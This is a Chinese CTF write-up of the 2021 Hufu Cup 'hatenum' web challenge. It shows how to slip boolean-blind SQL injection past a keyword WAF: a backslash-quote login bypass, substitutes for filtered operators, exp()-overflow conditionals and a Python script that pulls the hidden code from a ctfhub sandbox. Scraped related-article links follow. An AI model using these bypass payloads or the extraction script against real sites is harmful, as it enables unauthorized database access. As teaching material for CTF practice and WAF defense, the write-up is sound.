前言

今天遇到个有意思的SQL盲注,花了不少功夫,也学到了新姿势,遂记录下来以备后续碰到相同场景使用。

题目

这是2021 虎符杯的一道web题,有一个目标站点且附带了源码。

源码内容包括:

主要逻辑在login.php 与config.php,删去多余代码,主要功能在登陆上。

前端登录表单会发送给login.php处理:

然后所有的post参数会交给config.php 中的array_waf去做处理.

array_waf 是一个递归检测的waf,检测是否包含sql_waf 和 num_waf 在内的规则,符合规则直接退出。

经过检测后会进入config.php 中的login函数进行数据库查询。

可以看到login函数直接将参数拼接到了sql语句上,很明显的sql注入,且返回只有error、success、fail状态。 success的状态下会进入home.php 拿到flag。

拿到题目,逻辑比较清晰,绕过waf进行sql注入,按照原始的登陆逻辑,我们需要知道正确的username、password以及code值,通过sql注入绕过用户名及密码检测逻辑及知道code值

解题

绕过账密检测

$sql = "select * from users where username='$username' and password='$password'";

		$res = $this->conn->query($sql);

根据这个sql拼接的方式绕过账密检测还是很简单的,因为sql_waf中限制',所以下面的payload就可以绕过账密检测。

username=admin\

password=||1#

select * from users where username='admin\' and password='||1#'

绕过code检测

因为在login逻辑中有对code值进行单独校验的部分,所以我们还需要利用上面的sql注入注出code的具体值。因为返回只有login fail、error两个结果,所以是个布尔盲注。

但盲注的大部分关键词都被waf限制,所以关键点就是绕waf。

sql_waf
if(preg_match('/union|select|or|and|\'|"|sleep|benchmark|regexp|repeat|get_lock|count|=|>|<| |\*|,|;|\r|\n|\t|substr|right|left|mid/i', $str)){

		die('Hack detected');

}

重点来看下sql_waf, 因为返回的内容有限,所以只能使用布尔盲注,而盲注通常会用到几个关键关键字:字符串截取类(substr、left、right、mid)、条件判断类(if)、语句分割类(空格、/**/)、逻辑运算类(and、or)。

一个盲注的payload: if(substr(database(),1,1)="t",1,0);

但很遗憾waf里面基本这些常用的都被禁用了,所以只能分别寻求替代

字符串截取类

禁用:substr、left、right、mid

绕过: like、rlike、inst

除开上面这些其实还可以使用 like、rlike、instr等

其中like与rlike的区别是 rlike支持正则表达式而like只支持如%,_等有限的通配符,like可以近似于"="

语句分割

禁用: 空格、\r(%0d)、\n(%0a)、\t(%09)\、/**/

语句之间分割常常使用空格

绕过: %a0(&nbsp)、%0b(垂直制表符)、%0c(换页符)

逻辑运算

禁用: and、or、=、>、<、regexp

绕过: &&、||、 like、greatest、least

条件判断

禁用: 因为禁用了,,所以if 语句没发使用

绕过: exp

EXP函数(本篇文章精髓)

这里重点其实就是exp函数,在sql注入里面exp函数一般被用做报错注入(mysql<5.5.53)里面输出报错信息。

如:

select exp(~(select*from(select user())x))

利用的是Double 溢出,exp(x) 含义为ex ,当x>709时就超过了double的取值范围造成报错。:

而例子中把字查询按位取反就能得到远大于709的值,报错就会把子查询内容显出出来。

其实除了能用在报错注入以外,利用exp在参数大于709时会报错的特性可以用来构造条件判断语句。

select exp(710 - expr)

在上面sql语句中 expr 若为 true 等价于0 则 语句就会报错(exp(710)),若expr 为false 等价于0 则语句正常执行。

code 注入

有了前面所有的绕过,就能构造语句进行code值注入了。

1. 判断code 长度:
||exp(710-((length(code))like({x})))
2. 猜解code字段具体值
||exp(710-((code)rlike(0x{reg_str})))#

因为' 被过滤,所以rlike后面不能出现字符串,需要 将正则表达式 ^xxx 转换成十六进制。

3. 绕过num_waf

这里面还有一个坑,num_waf 有个判断十六进制位数不能超过9位,既字符串不能超过4位,所以在包含正则^以外的字符串超过3位时需要 不断做替换,用3位字符串去匹配下一位。

逻辑很简单,需要花点心思去编码,

总结

如果有waf 限制了if 的使用,特殊情况下可以考虑通过exp函数来绕过。

代码

"""

ctfhub hatenum 盲注脚本

"""

import requests

from loguru import logger

target = "http://challenge-732f479a63a3f952.sandbox.ctfhub.com:10800/login.php"

s = requests.session()

code_column_length = 0

def guess_length():

    """

    猜解 code 字段长度

    :return:

    """

    global code_column_length

    for x in range(1, 100):

        payload = f"||exp(710-((length(code))like({x})))#"

        if my_request(payload_tamper(payload)):

            code_column_length = x

            break

    logger.info(f"code的长度为:{code_column_length}")

def guess_code_str():

    """

    实际猜解 code 字符串内容

    :return:

    """

    code_str = ""

    tmp_str = ""

    waf = False

    for line_index in range(code_column_length):

        logger.info(f"{line_index} - tmp_str - {tmp_str}")

        if len(tmp_str) > 2:

            logger.debug("超长了")

            logger.debug(f"压缩前 {tmp_str}")

            tmp_str = tmp_str[len(tmp_str)-2:]

            logger.debug(f"压缩后 {tmp_str}")

            waf = True

        for x in range(48, 128):

            if x in [63, 95, 124]:

                continue

            o_str = f"^{tmp_str}{chr(x)}"

            if waf:

                o_str = f"{tmp_str}{chr(x)}"

            reg_str = o_str.encode().hex()

            logger.debug(f"{x}-{chr(x)}-{o_str}")

            payload = f"||exp(710-((code)rlike(0x{reg_str})))#"

            if my_request(payload_tamper(payload)):

                tmp_str += chr(x)

                code_str += chr(x)

                logger.info(code_str)

                break

    logger.info(code_str)

def response_check(rs):

    """

    布尔 banner 判断

    :param rs:

    :return:

    """

    logger.debug(rs.text)

    if "error" in rs.text:

        return False

    elif "detected" in rs.text:

        logger.error(rs.text)

        exit("waf")

    return True

def payload_tamper(payload: str):

    """绕过过滤"""

    return payload

    # return payload.replace(" ", "%a0")

def my_request(password):

    """请求封装"""

    logger.debug(f"payload:{password}")

    username = "admin\\"

    code = "1"

    p_data = gen_post_data(username, password, code)

    rs = s.post(url=target, data=p_data, headers={'Content-Type': "application/x-www-form-urlencoded"}

                , proxies={"http": "http://127.0.0.1:8088"}, allow_redirects=False)

    if response_check(rs):

        return True

    return False

def gen_post_data(username, password, code):

    """post 内容组装"""

    data = dict()

    data["username"] = username

    data["password"] = password

    data["code"] = code

    # 手动构造避免自动 urlencode

    return f"username={username}&password={password}&code={code}"

def run():

    guess_length()  # 先猜测code长度

    guess_code_str()  # 根据长度猜测内容

if __name__ == '__main__':

    run()

公众号

欢迎大家关注我的公众号,这里有干货满满的硬核安全知识,和我一起学起来吧!

2021 虎符杯hate num 注入题的更多相关文章

  1. 第四届蓝桥杯 c/c++真题

    第四届蓝桥杯 c/c++真题 <1>高斯日记 问题 大数学家高斯有个好习惯:无论如何都要记日记. 他的日记有个与众不同的地方,他从不注明年月日,而是用一个整数代替,比如:4210 后来人们 ...

  2. Python解答蓝桥杯省赛真题之从入门到真题(二刷题目一直更新)

    蓝桥刷题 原文链接: https://github.com/libo-sober/LanQiaoCup Python解答蓝桥杯省赛真题之从入门到真题 不同字串 """ 一 ...

  3. Java程序设计(2021春)——第一章课后题(选择题+编程题)答案与详解

    Java程序设计(2021春)--第一章课后题(选择题+编程题)答案与详解 目录 Java程序设计(2021春)--第一章课后题(选择题+编程题)答案与详解 第一章选择题 1.1 Java与面向对象程 ...

  4. 2021羊城杯比赛复现(Crypto)

    bigrsa 题目: from Crypto.Util.number import * from flag import * n1 = 10383529640908175186077053551474 ...

  5. 2021蓝桥杯省赛B组(C/C++)E.路径【最短路DP】

    2021蓝桥杯省赛B组题目(C/C++)E.路径 最短路径, 因为变化情况比较多, 所以开始想的是深搜, 但是太慢了, 跑不出来, 后来就想着优化一下, 有的地方到另一个地方可能会考虑很多遍, 于是考 ...

  6. 2021.12.21 eleveni的刷题记录

    2021.12.21 eleveni的刷题记录 0. 有意思的题 P6701 [POI1997] Genotype https://www.luogu.com.cn/problem/P6701 状压优 ...

  7. 2021.12.19 eleveni的刷题记录

    2021.12.19 eleveni的刷题记录 0. 本次记录有意思的题 0.1 每个点恰好经过一次并且求最小时间 P2469 [SDOI2010]星际竞速 https://www.luogu.com ...

  8. 2021.12.16 eleveni的刷题记录

    2021.12.16 eleveni的刷题记录 1. 数论 https://www.luogu.com.cn/problem/P2532 1.1卡特兰数 https://www.luogu.com.c ...

  9. 蓝桥杯java历年真题及答案整理1~20.md

    蓝桥杯java历年真题及答案整理(闭关一个月,呕心沥血整理出来的) 1 算法是这样的,如果给定N个不同字符,将这N个字符全排列,最终的结果将会是N!种.如:给定 A.B.C三个不同的字符,则结果为:A ...

  10. 南邮CTF--SQL注入题

    南邮CTF--SQL注入题 题目:GBK SQL injection 解析: 1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清题目,GBK,接下来利用宽字节进行注入 2.使用'%df' ' ...

随机推荐

  1. 时间片 线程切换 指令周期 流水线 TPS的初步了解

    时间片 线程切换 指令周期 流水线 TPS的初步了解 情况说明 Redis 单线程提供服务, 可以支撑十万级别的TPS 通过以个非常简单的测试 redis-benchmark -c 50 -n 500 ...

  2. [转帖]yum 下载全量依赖 rpm 包及离线安装(终极解决方案)

    简介 通常生产环境由于安全原因都无法访问互联网.此时就需要进行离线安装,主要有两种方式:源码编译.rpm包安装.源码编译耗费时间长且缺乏编译环境,所以一般都选择使用离线 rpm 包安装. 验证环境 C ...

  3. [转帖]Oracle 通过 Exadata 云基础设施 X9M 提供卓越的数据库性能和规模

    https://www.modb.pro/db/397202 32个节点的RAC 服务器 每个服务器 两个 64核心的AMD CPU 四个线程干管理 252个线程进行数据库处理 252*32=8064 ...

  4. Springboot下micrometer+prometheus+grafana进行JVM监控的操作过程

    Springboot下micrometer+prometheus+grafana进行JVM监控的操作过程 背景 同事今天提交了一个补丁. 给基于Springboot的产品增加了micrometer等收 ...

  5. linux机制

    cpu Cache 工作原理:文中对Cache的一致性提出了两种策略:基于监听的和基于目录的.前者是所有Cache均监听各个Cache的写操作,当一个Cache中的数据被写了,其处理方式有:写更新协议 ...

  6. TypeScript数组类型定义

    第一种方式:可以在元素类型后面接上 [],表示由此类型元素组成的一个数组: var arr: number[] = [1, 2, 3]; //数字类型的数组 var arr2: string[] = ...

  7. fasthttp 中如何使用`Transfer-Encoding: chunked` 方式的流式内容输出

    作者:张富春(ahfuzhang),转载时请注明作者和引用链接,谢谢! cnblogs博客 zhihu Github 公众号:一本正经的瞎扯 具体的思路是这样:通过 RequestCtx 的 Conn ...

  8. 从零开始配置 vim(11)——插件管理

    之前我们介绍了基础配置部分和快捷键配置部分.如果你配置了这两个部分,vim已经算是比较好用了.但是作为代码编辑器来讲还是显的比较简陋,用这些配置来完成日常的编码任务会显得力不从心.vim比较强大的一点 ...

  9. 窗口管理器 dwm安装

    上一篇博文中,已经完成了archlinux的安装,但是进去仅仅是一个冰冷冷的交互式命令窗口.没有图像,也无法打开浏览器.离日常使用还差的很远,接下来首先需要做的就是安装桌面环境.这里我不打算使用诸如g ...

  10. Python自动化办公--Pandas玩转Excel数据分析【三】

    相关文章: Python自动化办公--Pandas玩转Excel[一] Python自动化办公--Pandas玩转Excel数据分析[二] python处理Excel实现自动化办公教学(含实战)[一] ...